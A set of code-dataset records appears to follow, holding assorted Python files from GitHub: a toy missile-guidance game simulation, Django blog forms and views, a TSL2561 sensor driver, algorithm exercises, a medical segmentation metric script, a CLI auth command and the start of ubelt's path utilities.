worst way to guide a missile, aka\n points the missile directly at the plane\n *** + omega is clockwise - is ct clockwise\n \"\"\"\n x, y, vx, vy = plane.missile_tracking()\n vec_target = [x-self.x, y-self.y] # displacement vector\n vec_missile = [self.v[0], self.v[1]] # velocity vector\n dot_prod = vec_target[0] * vec_missile[0] + vec_target[1] * vec_missile[1]\n mag_prod = sqrt(vec_target[0]**2 + vec_target[1]**2) * sqrt(vec_missile[0]**2 + vec_missile[1]**2)\n cross_prod_k = vec_target[0] * vec_missile[1] - vec_missile[0] * vec_target[1]\n try:\n omega = acos(dot_prod/mag_prod)\n except ValueError:\n # due to floating point math, dot product can be > magnitude when they're perfectly aligned...\n omega = 0\n # this gets how much omega can be done and how much v will be bled\n turn_command, decel = self.calc_angle_drag(omega)\n # fixing omega using cross product..\n if cross_prod_k > 0:\n turn_command *= -1\n # steers missile\n self.turn(turn_command, decel)\n self.x += self.v[0] * self.dt\n self.y += self.v[1] * self.dt\n\n \n def proportional_guidance(self, plane):\n ''' the real beast of an algorithm\n normal accel = N * LOS rate * closing V\n accel is proportional to LOS rate and closing velocity\n N = navigational gain (3-5 according to wiki)\n '''\n if len(self.p_last) == 0 or len(self.m_last) == 0:\n # upon initialization\n self.p_last = [plane.x, plane.y]\n self.m_last = [self.x, self.y]\n self.pure_guidance(plane)\n else:\n x, y, vx, vy = plane.missile_tracking()\n # both vectors are of velocity\n V0 = [self.p_last[0]-self.m_last[0], self.p_last[1], self.m_last[1]]\n V1 = [x - self.x, y - self.y]\n self.p_last[0] = x\n self.p_last[1] = y\n self.m_last[0] = self.x\n self.m_last[1] = self.y\n dot_prod = V0[0] * V1[0] + V0[1] * V1[1]\n mag_prod = sqrt(V0[0]**2 + V0[1]**2) * sqrt(V1[0]**2 + V1[1]**2)\n cross_prod_k = V0[0] * V1[1] - V1[0] * V0[1]\n try:\n omega = acos(dot_prod/mag_prod)\n except ValueError:\n # due to floating point math, dot product can be > magnitude when they're perfectly aligned...\n omega = 0\n # fixing omega using cross product..\n if cross_prod_k > 0:\n omega *= -1\n rate_LOS = omega * self.dt\n print(rate_LOS)\n \n\n def calc_angle_drag(self, desired_omega):\n \"\"\" (float) -> float, float\n determines how much turn is possible according to what's desired\n and how much speed is kept after bleed(as a fraction of v)\n \"\"\"\n max_omega = (self.omega/180) * pi * self.dt\n if abs(desired_omega) >= max_omega:\n # missile cant turn fast enough, max omega commanded\n turn_commanded = max_omega\n decel = self.turn_drag\n else:\n # missile doesn't need max omega\n turn_commanded = desired_omega\n decel = (desired_omega/max_omega) * self.turn_drag\n return turn_commanded, decel\n\n\n def turn(self, turn, drag):\n \"\"\" (float, float) -> void\n actually steers the missile according to what's commanded\n DOES NOT move the missile\n ** also bleeds speed off the missile\n \"\"\"\n theta = atan2(self.v[1], self.v[0])\n self.v[0] += drag * cos(theta) * self.dt\n self.v[1] += drag * sin(theta) * self.dt\n vx = self.v[0]\n vy = self.v[1]\n # rotation matrix\n self.v[0] = vx * cos(turn) - vy * sin(turn)\n self.v[1] = vx * sin(turn) + vy * cos(turn)\n \n\n def move(self, plane):\n \"\"\" (Plane) -> void\n moves the missile forward according to a specific guidance\n does NOT return new coordinates\n \"\"\"\n if self.guidance_mode == 1:\n # -> pure guidance\n self.pure_guidance(plane)\n # self.proportional_guidance(plane)\n elif self.guidance_mode == 2:\n # TODO\n pass\n \n\n def pos(self):\n \"\"\" () -> tuple(int, int) \n this one will return the current position\n \"\"\"\n return (int(round(self.x)), int(round(self.y)))\n\n\n def get_angle(self):\n '''() -> float\n returns the angle to rotate the missile img\n '''\n ang = atan2(self.v[0], self.v[1])\n return ang * 180 / pi + 180\n\n\n def shift(self, shift_x, shift_y):\n \"\"\" (float, float) -> void\n same as in Plane class\n \"\"\"\n self.x += shift_x\n self.y += shift_y","repo_name":"Kompensator/AIM9X-Sidewinder","sub_path":"missile.py","file_name":"missile.py","file_ext":"py","file_size_in_byte":5803,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12655316815","text":"import numpy as np\nfrom timeit import default_timer as timer\nfrom numba import vectorize\nimport time\n\n\n\n@vectorize(['float64(float64, float64)'], target='cuda')\ndef pow_gpu(a, b):\n c = a ** b\n return c\n\n\ndef gpu_loop():\n a = b = np.array(np.random.rand(1, 1, 1, 1), dtype=np.float64)\n pow_gpu(a, b)\n return \"Compatible\"\n\n\n\nif __name__ == '__main__':\n try:\n print(gpu_loop())\n except:\n print(\"Not Compatible\")","repo_name":"jross263/HCI-Group-Project","sub_path":"StressTest-GPU/checkGPU.py","file_name":"checkGPU.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13355617790","text":"from reader import InferReader\nfrom train import *\n\nif __name__ == '__main__':\n model = pp.Model(Net(is_infer=True), inputs=input_define)\n model.load(\"/Users/zhanghongji/PycharmProjects/CaptchaDataset/Classify_Module/output/final\")\n model.prepare()\n infer_reader = InferReader(DATA_PATH)\n result = model.predict(test_data=infer_reader)[0]\n\n img_list = infer_reader.get_names()\n img_index = 0\n for mini_batch in result:\n for sample in mini_batch:\n print(f\"{img_list[img_index]}的推理结果为:{sample}\")\n img_index += 1\n\n","repo_name":"GT-ZhangAcer/CaptchaDataset","sub_path":"Classify_Module/infer.py","file_name":"infer.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"12005296965","text":"def permute(nums):\n to_return = []\n def get_parm(arr, left, right):\n if left==right:\n tmp = []\n for item in arr:\n tmp.append(item)\n to_return.append(tmp)\n else:\n for i in range(left, right+1):\n arr[left], arr[i] = arr[i], arr[left]\n get_parm(arr, left+1, right)\n arr[left], arr[i] = arr[i], arr[left]\n get_parm(nums,0, len(nums)-1)\n return to_return\n\nprint(permute([1, 2, 3]))","repo_name":"Kontowicz/Daily-Interview-Pro","sub_path":"solutions/day_78.py","file_name":"day_78.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"578298017","text":"import numpy as np\n\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\nimport matplotlib.pyplot as plt\nplt.rcParams[\"figure.figsize\"] = (10,10)\nplt.ion()\n\n\nclass Character(object):\n def __init__(self):\n super().__init__()\n self.geometry = []\n self.__angle = 0.0\n self.speed = 0.1\n self.pos = np.zeros((2,))\n self.dir = np.array([0,1])\n self.color = 'r'\n self.C = np.identity(3)\n self.R = np.identity(3)\n self.T = np.identity(3)\n\n\n def draw(self):\n x_values = [1,2,3,4]\n y_values = [5,5,5,5]\n for vec2d in self.geometry:\n x_values.append(vec2d[0])\n y_values.append(vec2d[1])\n plt.plot(x_values, y_values)\n\n def generate_geometry(self):\n pass\n\n\nclass Asteroid(Character):\n def __init__(self):\n super().__init__()\n\n def generate_geometry(self):\n self.geometry = []\n\n\nclass Player(Character):\n def __init__(self):\n super().__init__()\n\n def generate_geometry(self):\n self.geometry = np.array([\n [-1, 0],\n [1, 0],\n [0, 1],\n [-1, 0]\n ])\n\n\ncharacters = []\nplayer1 = Player()\ncharacters.append(player1)\ncharacters.append(Asteroid())\ncharacters.append(Asteroid())\n\nis_running = True\ndef press(event):\n global is_running, player\n print('press', event.key)\n if event.key == 'escape':\n is_running = False # quits app\n elif event.key == 'right':\n player.set_angle(player.get_angle() - 5)\n elif event.key == 'left':\n player.set_angle(player.get_angle() + 5)\n\nfig, _ = plt.subplots()\nfig.canvas.mpl_connect('key_press_event', press)\n\nwhile is_running:\n plt.clf()\n\n plt.xlim(-10, 10)\n plt.ylim(-10, 10)\n\n for character in characters: # polymorhism\n character.draw()\n\n plt.draw()\n plt.pause(1e-2)","repo_name":"reinisrozenbahs/Bakalaura_darbs","sub_path":"game_template.py","file_name":"game_template.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13599808008","text":"from typing import *\n\n\nclass Solution:\n def readBinaryWatch(self, turnedOn: int) -> List[str]:\n numbers = []\n for h in range(12):\n h_bin = bin(h)[2:]\n h_ones = h_bin.count('1')\n if turnedOn - h_ones >= 0:\n for min in range(60):\n min_bin = bin(min)[2:]\n min_ones = min_bin.count('1')\n if turnedOn - h_ones - min_ones == 0:\n numbers.append(f'{h}:{min:02}')\n return numbers\n\n\ns = Solution()\nprint(s.readBinaryWatch(1))\n","repo_name":"Alset-Nikolas/Algorithms-Letcode","sub_path":"Easy/2/401.BinaryWatch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17701684190","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n# from localflavor.br.forms import BRCPFField\n# from pycpfcnpj import cpfcnpj\nfrom . import models\n\n\nclass BookForm(forms.ModelForm):\n class Meta:\n model = models.Livro\n fields = (\n 'nome', 'genero', 'escritor', 'editora', 'data_pub'\n )\n\n\nclass ClienteForm(forms.ModelForm):\n class Meta:\n model = models.Cliente\n\n # cpf = BRCPFField()\n\n fields = (\n 'nome_completo', 'cpf', 'nascimento', 'telefone', 'email', 'endereco',\n )\n\n def clean_cpf(self):\n cpf = self.cleaned_data.get('cpf')\n if (len(cpf) != 11):\n raise ValidationError('CPF inválido', code='invalid')\n return cpf\n\n def clean_telefone(self):\n telefone = self.cleaned_data.get('telefone')\n if (len(telefone) != 11):\n raise ValidationError('Telefone inválido', code='invalid')\n return telefone\n\n\nclass RentForm(forms.ModelForm):\n class Meta:\n model = models.Cliente_Livro\n fields = (\n 'id_cliente',\n )\n","repo_name":"Shelainy/biblioteca","sub_path":"library/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27500549697","text":"# Code sourced from:\n# https://github.com/seanbechhofer/raspberrypi/blob/master/python/TSL2561.py\n# https://github.com/adafruit/Adafruit_CircuitPython_TSL2561/blob/0c205ed557cf03bad6ab73f10a4b132b40d47bd6/adafruit_tsl2561.py#L127\nimport time\nimport smbus\n\n_DEFAULT_ADDRESS = 0x39\n_COMMAND_BIT = 0x80\n\n_CONTROL_POWERON = 0x03\n_CONTROL_POWEROFF = 0x00\n\n_REGISTER_CONTROL = 0x00\n_REGISTER_TIMING = 0x01\n_REGISTER_CHAN0_LOW = 0x0C\n_REGISTER_CHAN1_LOW = 0x0E\n_GAIN_SCALE = (16, 1)\n_TIME_SCALE = (0.034, 0.252, 1)\n_CLIP_THRESHOLD = (4900, 37000, 65000)\n\nclass TSL2561:\n\n def __init__(self, bus, address = _DEFAULT_ADDRESS, pause = 1):\n self.bus = bus\n self.address = address\n self.pause = pause\n self.gain = 0\n self.integration_time = 2\n self.enable() # power on\n self.set_gain() # 1x gain preselected\n self.set_integration_time() # 402ms integration\n \n def enable(self):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_CONTROL, _CONTROL_POWERON)\n \n def disable(self):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_CONTROL, _CONTROL_POWEROFF)\n\n def set_gain(self, gain = 0):\n # 0x00(00) gain = 1x\n # 0x10(00) gain = 16x\n if (gain != self.gain):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_TIMING, gain<<4 | self.integration_time)\n self.gain = gain \n time.sleep(self.pause)\n \n def set_integration_time(self, integration_time = 2):\n # 0x00(00) integration time = 13.7ms\n # 0x01(01) integration time = 101ms\n # 0x02(02) integration time = 402ms\n if (integration_time != self.integration_time):\n self.bus.write_byte_data(self.address, _COMMAND_BIT | _REGISTER_TIMING, self.gain<<4 | integration_time)\n self.integration_time = integration_time\n time.sleep(self.pause)\n \n def read_broadband(self):\n low, high = self.bus.read_i2c_block_data(self.address, _COMMAND_BIT | _REGISTER_CHAN0_LOW, 0x02)\n return high << 8 | low\n\n def read_infrared(self):\n low, high = self.bus.read_i2c_block_data(self.address, _COMMAND_BIT | _REGISTER_CHAN1_LOW, 0x02)\n return high << 8 | low\n\n def read_lux(self):\n ch0, ch1 = self.read_broadband(), self.read_infrared()\n if ch0 == 0:\n return None\n if ch0 >= _CLIP_THRESHOLD[self.integration_time]:\n return None\n if ch1 >= _CLIP_THRESHOLD[self.integration_time]:\n return None\n ratio = ch1 / ch0\n if ratio >= 0 and ratio <= 0.50:\n lux = 0.0304 * ch0 - 0.062 * ch0 * ratio**1.4\n elif ratio <= 0.61:\n lux = 0.0224 * ch0 - 0.031 * ch1\n elif ratio <= 0.80:\n lux = 0.0128 * ch0 - 0.0153 * ch1\n elif ratio <= 1.30:\n lux = 0.00146 * ch0 - 0.00112 * ch1\n else:\n lux = 0.\n # Pretty sure the floating point math formula on pg. 23 of datasheet\n # is based on 16x gain and 402ms integration time. Need to scale\n # result for other settings.\n # Scale for gain.\n lux *= _GAIN_SCALE[self.gain]\n # Scale for integration time.\n lux /= _TIME_SCALE[self.integration_time]\n return lux \n\nif __name__ == \"__main__\":\n bus = smbus.SMBus(1)\n tsl=TSL2561(bus)\n tsl.set_gain(0)\n tsl.set_integration_time(0)\n test = tsl.read_lux()\n print(test)\n \n'''\nimport smbus\nimport time\n\n# Get I2C bus\nbus = smbus.SMBus(1)\n\ntsl2561Address = 0x39 # TSL2561 address, (57)\n# Select control register, 0x00(00) with command register, 0x80(128)\n# 0x03(03) Power ON mode\nbus.write_byte_data(0x39, 0x00 | 0x80, 0x03)\n# TSL2561 address, 0x39(57)\n# Select timing register, 0x01(01) with command register, 0x80(128)\n# 0x02(02) Nominal integration time = 402ms\nbus.write_byte_data(0x39, 0x01 | 0x80, 0x02)\n\ntime.sleep(0.5)\n\n# Read data back from 0x0C(12) with command register, 0x80(128), 2 bytes\n# ch0 LSB, ch0 MSB\ndata = bus.read_i2c_block_data(0x39, 0x0C | 0x80, 0x02)\n\n# Read data back from 0x0E(14) with command register, 0x80(128), 2 bytes\n# ch1 LSB, ch1 MSB\ndata1 = bus.read_i2c_block_data(0x39, 0x0E | 0x80, 0x02)\n\n# Convert the data\nprint(data[0],data[1])\nch0 = data[1] * 256 + data[0]\nch1 = data1[1] * 256 + data1[0]\n\n# Output data to screen\nprint ('Full Spectrum(IR + Visible) :{:.1f} lux'.format(ch0))\nprint ('Infrared Value :{:.1f} lux'.format(ch1))\nprint ('Visible Value :{:.1f} lux'.format(ch0 - ch1))\n'''","repo_name":"TzuHuanTai/RaspberryPi_Weather","sub_path":"tsl2561.py","file_name":"tsl2561.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12005259305","text":"from collections import deque\n\nclass Node(object):\n def __init__(self, value, left=None, right=None):\n self.left = left\n self.right = right\n self.value = value\n def __str__(self):\n q = deque()\n q.append(self)\n result = ''\n while len(q):\n num = len(q)\n while num > 0:\n n = q.popleft()\n result += str(n.value)\n if n.left:\n q.append(n.left)\n if n.right:\n q.append(n.right)\n num = num - 1\n if len(q):\n result += \"\\n\"\n\n return result\ndef fullBinaryTree(node):\n if node == None:\n return None\n node.left = fullBinaryTree(node.left)\n node.right = fullBinaryTree(node.right)\n\n if node.left == None and node.right == None:\n return node\n\n if node.left == None:\n new = node.right\n tmp = node\n node = None\n del(tmp)\n return new\n\n if node.right == None:\n new = node.left\n tmp = node\n node = None\n del(tmp)\n return new\n return node\n\ntree = Node(1)\ntree.left = Node(2)\ntree.right = Node(3)\ntree.right.right = Node(4)\ntree.right.left = Node(9)\ntree.left.left = Node(0)\nprint(fullBinaryTree(tree))\n# 1\n# 03\n# 94","repo_name":"Kontowicz/Daily-Interview-Pro","sub_path":"solutions/day_64.py","file_name":"day_64.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31438758294","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 17 12:24:06 2023\n\n@author: andreasaspe\n\"\"\"\n\nimport os\nfrom os import listdir\nimport numpy as np\nfrom tqdm import tqdm\nimport nibabel as nib\nimport pandas as pd\nimport cv2\nfrom my_plotting_functions import *\nfrom my_data_utils import dice_score\nfrom my_data_utils import *\nfrom my_plotting_functions import *\n\n\n#######################################################\n#################### CONTROL PANEL ####################\n#######################################################\n#Define scans\nall_scans = 1\nlist_of_subjects = ['sub-verse558']\n\ndata_type = 'test'\n\n#HUSK AT GENNEMGÅ FIL FOR FLERE TING AT ÆNDRE\n#Define directories Titans\ndir_segmentations = '/scratch/s174197/data/Verse20/Predictions_from_titans/FULL_SEGMENTATIONS_batchnorm_beforeCCA_evenbetterrotation'\ndir_GT = '/scratch/s174197/data/Verse20/Predictions_from_titans/FULL_SEGMENTATIONS_batchnorm_GT'\ndir_data_stage3 = '/scratch/s174197/data/Verse20/VertebraeSegmentation/Verse20_'+data_type+'_prep_NOPADDING'\npredictions_dataframe_folder = '/scratch/s174197/data/Verse20/Predictions_dataframes_from_titans'\n\n#Define directories MAC\n# dir_segmentations = '/Users/andreasaspe/Documents/Data/Verse20/Predictions_segmentations'\n# dir_data_stage3 = '/Users/andreasaspe/Documents/Data/Verse20/VertebraeSegmentation/Verse20_'+data_type+'_prep_NOPADDING' #'/zhome/bb/f/127616/Documents/Thesis/Rawdata_training'\n# predictions_dataframe_folder = '/Users/andreasaspe/Documents/Data/Verse20/Predictions_dataframe'\n\n#######################################################\n#######################################################\n#######################################################\n\n#Convert directories\ndir_segmentations = os.path.join(dir_segmentations,data_type)\ndir_GT = os.path.join(dir_GT,data_type)\ndir_stage3_img = os.path.join(dir_data_stage3,'img')\ndir_predictions_dataframe_folder = os.path.join(predictions_dataframe_folder,data_type,'evenbetterrotation_before')\n\nif not os.path.exists(dir_predictions_dataframe_folder):\n os.makedirs(dir_predictions_dataframe_folder)\n\n\n#Define list of scans\nif all_scans:\n all_subjects = []\n for filename in listdir(dir_GT):\n subject = filename.split(\"_\")[0]\n #if subject.find('verse') != -1: #PLOTTER KUN VERSE. IKKE GL\n all_subjects.append(subject)\n all_subjects = np.unique(all_subjects)\n #Sorterer fil '.DS' fra\n all_subjects = all_subjects[all_subjects != '.DS']\n all_subjects = all_subjects.tolist()\nelse:\n all_subjects = list_of_subjects\n\n\n\nDSC_list = []\navg_DSC_list = []\nHausdorff_list = []\navg_Hausdorff_list = []\n\n\n\nfor counter, subject in enumerate(tqdm(all_subjects)):\n \n print()\n print()\n print(subject)\n print()\n print()\n \n #Define filenames\n # FOR MAC\n # filename_msk_GT = [f for f in listdir(dir_segmentations) if (f.startswith(subject) and f.endswith('GT.nii.gz'))][0]\n # filename_msk_pred = [f for f in listdir(dir_segmentations) if (f.startswith(subject) and f.endswith('PREDICTION.nii.gz'))][0]\n # filename_img = [f for f in listdir(dir_stage3_img) if (f.startswith(subject) and f.endswith('img.nii.gz'))][0]\n\n #TITANS\n filename_msk_GT = [f for f in listdir(dir_GT) if (f.startswith(subject) and f.endswith('GT.nii.gz'))][0]\n filename_msk_pred = [f for f in listdir(dir_segmentations) if (f.startswith(subject) and f.endswith('PREDICTIONbefore.nii.gz'))][0]\n filename_img = [f for f in listdir(dir_stage3_img) if (f.startswith(subject) and f.endswith('img.nii.gz'))][0]\n\n #Load Nifti files\n msk_nib_GT = nib.load(os.path.join(dir_GT,filename_msk_GT))\n msk_nib_pred = nib.load(os.path.join(dir_segmentations,filename_msk_pred))\n img_nib = nib.load(os.path.join(dir_stage3_img,filename_img))\n\n #Get data\n data_msk_GT = np.asanyarray(msk_nib_GT.dataobj, dtype=np.float32)\n data_msk_pred = np.asanyarray(msk_nib_pred.dataobj, dtype=np.float32)\n data_img = np.asanyarray(img_nib.dataobj, dtype=np.float32)\n \n \n v_numbers = np.unique(data_msk_pred)\n\n DSC_all = [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan]\n Hausdorff_all = [np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan,np.nan]\n\n \n for i in range(len(v_numbers)-1): #Fordi vi gider ikke have 0 med\n v_number = int(v_numbers[i+1]) #i+1 fordi vi ikke gider at have 0 med\n msk_GT = np.where(data_msk_GT == v_number,1,0)\n msk_pred = np.where(data_msk_pred == v_number,1,0)\n \n \n #Get indices to crop it tigthly\n x_indices_GT, y_indices_GT, z_indices_GT = np.where(msk_GT != 0)\n x_indices_pred, y_indices_pred, z_indices_pred = np.where(msk_pred != 0)\n \n # Calculate the bounding box coordinates\n x_min = np.min(np.concatenate((x_indices_GT,x_indices_pred)))\n x_max = np.max(np.concatenate((x_indices_GT,x_indices_pred)))\n y_min = np.min(np.concatenate((y_indices_GT,y_indices_pred)))\n y_max = np.max(np.concatenate((y_indices_GT,y_indices_pred)))\n z_min = np.min(np.concatenate((z_indices_GT,z_indices_pred)))\n z_max = np.max(np.concatenate((z_indices_GT,z_indices_pred)))\n \n #Crop\n msk_GT = msk_GT[x_min:x_max+1,y_min:y_max+1,z_min:z_max+1]\n msk_pred = msk_pred[x_min:x_max+1,y_min:y_max+1,z_min:z_max+1]\n \n #Find contours!\n \n contour_image_GT = find_3d_contours(msk_GT)\n contour_image_pred = find_3d_contours(msk_pred)\n \n DSC = dice_score(msk_GT,msk_pred)\n print(number_to_name[v_number])\n print(\"Dice is {:.2f}\".format(DSC))\n Hausdorff = hausdorff_distance_3d(contour_image_GT,contour_image_pred)\n print(\"Hausdorff dist is {:.2f}\".format(Hausdorff))\n \n \n DSC_all[abs(v_number-24)] = DSC #L5 er første plads i stedet for sidste\n Hausdorff_all[abs(v_number-24)] = Hausdorff\n \n print()\n \n DSC_list.append(DSC_all)\n avg_DSC_list.append(np.nanmean(DSC_all))\n Hausdorff_list.append(Hausdorff_all)\n avg_Hausdorff_list.append(np.nanmean(Hausdorff_all))\n\ncolumn_names = ['L5','L4','L3','L2','L1','T12','T11','T10']\n\nDSC_dataframe = pd.DataFrame(DSC_list, columns=column_names)\nDSC_dataframe.insert(0, 'Average distance', avg_DSC_list)\nDSC_dataframe.insert(0, 'subjects', all_subjects)\nDSC_dataframe.to_csv(os.path.join(dir_predictions_dataframe_folder,'df_DSC.csv'), index=False)\n\n\nHAUSDORFF_dataframe = pd.DataFrame(Hausdorff_list, columns=column_names)\nHAUSDORFF_dataframe.insert(0, 'Average distance', avg_Hausdorff_list)\nHAUSDORFF_dataframe.insert(0, 'subjects', all_subjects)\nHAUSDORFF_dataframe.to_csv(os.path.join(dir_predictions_dataframe_folder,'df_HAUSDORFF.csv'), index=False)\n \n \n\n ","repo_name":"andreasaspe/Thesis_code","sub_path":"Other_scripts/Verse_predict_pipeline/Evaluate_metrics.py","file_name":"Evaluate_metrics.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5833681173","text":"from random import randint\nfrom time import sleep\ncomp = randint(0, 5)\nplayer = int(input('Adivinhe o número que eu pensei entre 0 e 5: '))\nprint('PROCESSANDO...')\nsleep(2)\nif comp == player:\n print('Acertou, Miserávi!!')\nelse:\n print('ERRRROOOOU!!')\nsleep(0.5)\nprint('Eu pensei no número {} e você escolheu {}'.format(comp, player))\n\n\n\n\n\n\n\n\n\n","repo_name":"othiagomanhaes/Python","sub_path":"Mundo 1/ex028.py","file_name":"ex028.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6067864591","text":"lista = list()\npares = list()\nimpares = list()\n\nwhile True:\n lista.append(int(input('Digite um número: ')))\n resposta = input('Deseja continuar?[S/N]: ')\n if resposta in 'Nn':\n break\nfor i, valor in enumerate(lista):\n if valor % 2 == 0:\n pares.append(valor)\n elif valor % 2 == 1:\n impares.append(valor)\nprint('-='*30)\nprint(f'A lista completa é {lista}\\nA lista de pares é {pares}\\nA lista de impares é {impares}')","repo_name":"Camilla-Carvalho/List-of-Algorithms","sub_path":"Estruturas de dados/Resoluções/82 -> Div valores em listas.py","file_name":"82 -> Div valores em listas.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"40790118098","text":"import os\nimport errno\nimport configparser\nfrom .command import GeneralCommand, CommandError\nfrom .. import auth\n\n\nclass InitAuth(GeneralCommand):\n \"\"\"Initialise auth\"\"\"\n\n @classmethod\n def add_parser(cls, parser, subparser):\n p = subparser.add_parser(\n \"init-auth\",\n description=\"Store auth information \" \"locally %s\" % auth.CONFIG_FILE_PATH,\n )\n p.add_argument(\"key\", help=\"Your API Key\")\n p.add_argument(\"secret\", help=\"Your API Secret\")\n\n return \"init-auth\"\n\n def execute(self):\n key, secret = auth.read_from_file()\n if key:\n raise CommandError(\n \"Authentication information already \"\n \"exists in \" + auth.CONFIG_FILE_PATH\n )\n\n try:\n os.mkdir(auth.CONFIG_DIR)\n os.chmod(auth.CONFIG_DIR, 0o700)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise CommandError(e)\n\n cfg = configparser.SafeConfigParser()\n cfg.add_section(\"main\")\n cfg.set(\"main\", \"key\", self.args.key)\n cfg.set(\"main\", \"secret\", self.args.secret)\n\n cfg.write(open(auth.CONFIG_FILE_PATH, \"w\"))\n os.chmod(auth.CONFIG_FILE_PATH, 0o600)\n","repo_name":"tiktalik-cloud/tiktalik-cli","sub_path":"tiktalik_cli/command/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"5591540905","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect\nfrom .models import Blog, PostImage, Comment, Tag\nfrom .forms import CommentForm\n\ndef all_blogs(request):\n blogs = Blog.objects.order_by('-date')\n return render(request, 'blog/all_blogs.html', {'blogs':blogs})\n\ndef detail(request, blog_id):\n if request.method == 'POST':\n cf = CommentForm(request.POST or None)\n if cf.is_valid():\n blog = get_object_or_404(Blog, pk=blog_id)\n content = request.POST.get('content')\n user = request.POST.get('user_name')\n email = request.POST.get('email')\n comment = Comment.objects.create(post = blog, user_name = user, email = email, content = content)\n comment.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n else:\n return render('blog/all_blogs.html', {'blogs':blogs}) \n else:\n cf = CommentForm()\n blog = get_object_or_404(Blog, pk=blog_id)\n photos = PostImage.objects.filter(post=blog_id)\n comment = Comment.objects.filter(post=blog_id)\n tag = Tag.objects.filter(post=blog_id)\n return render(request, 'updated/detail_blog.html',{'blog':blog, 'photos':photos, 'comments':comment ,'comment_form':cf, 'tag': tag})\n","repo_name":"shivam675/portfolio","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24880675395","text":"\"\"\"\nPath and filesystem utilities.\n\nThe :class:`Path` object is an extension of :class:`pathlib.Path` that contains\nextra convenience methods corresponding to the extra functional methods in this\nmodule. (New in 0.11.0). See the class documentation for more details.\n\nThis module also defines functional path-related utilities, but moving forward\nusers should prefer using :class:`Path` over standalone functional methods. The\nfunctions methods will still be available for the forseable future, but their\nfunctionality is made redundant by :class:`Path`. For completeness these\nfunctions are listed\n\nThe :func:`expandpath` function expands the tilde to $HOME and environment\nvariables to their values.\n\nThe :func:`augpath` function creates variants of an existing path without\nhaving to spend multiple lines of code splitting it up and stitching it back\ntogether.\n\nThe :func:`shrinkuser` function replaces your home directory with a tilde.\n\nThe :func:`userhome` function reports the home directory of the current user of\nthe operating system.\n\nThe :func:`ensuredir` function operates like ``mkdir -p`` in unix.\n\nNote:\n In the future the part of this module that defines Path may be renamed to\n util_pathlib.\n\"\"\"\nfrom os.path import (\n dirname, exists, expanduser, expandvars, join, normpath, split, splitext,\n)\nimport os\nimport sys\nfrom ubelt import util_io\nimport pathlib\nimport warnings\n\n\n__all__ = [\n 'Path', 'TempDir', 'augpath', 'shrinkuser', 'userhome', 'ensuredir',\n 'expandpath', 'ChDir',\n]\n\n\ndef augpath(path, suffix='', prefix='', ext=None, tail='', base=None,\n dpath=None, relative=None, multidot=False):\n \"\"\"\n Create a new path with a different extension, basename, directory, prefix,\n and/or suffix.\n\n A prefix is inserted before the basename. A suffix is inserted\n between the basename and the extension. The basename and extension can be\n replaced with a new one. Essentially a path is broken down into components\n (dpath, base, ext), and then recombined as (dpath, prefix, base, suffix,\n ext) after replacing any specified component.\n\n Args:\n path (str | PathLike): a path to augment\n\n suffix (str):\n placed between the basename and extension\n Note: this is referred to as stemsuffix in :func:`ub.Path.augment`.\n\n prefix (str):\n placed in front of the basename\n\n ext (str | None):\n if specified, replaces the extension\n\n tail (str | None):\n If specified, appends this text to the extension\n\n base (str | None):\n if specified, replaces the basename without extension.\n Note: this is referred to as stem in :func:`ub.Path.augment`.\n\n dpath (str | PathLike | None):\n if specified, replaces the specified \"relative\" directory, which by\n default is the parent directory.\n\n relative (str | PathLike | None):\n Replaces ``relative`` with ``dpath`` in ``path``.\n Has no effect if ``dpath`` is not specified.\n Defaults to the dirname of the input ``path``.\n *experimental* not currently implemented.\n\n multidot (bool): Allows extensions to contain multiple\n dots. Specifically, if False, everything after the last dot in the\n basename is the extension. If True, everything after the first dot\n in the basename is the extension.\n\n Returns:\n str: augmented path\n\n Example:\n >>> import ubelt as 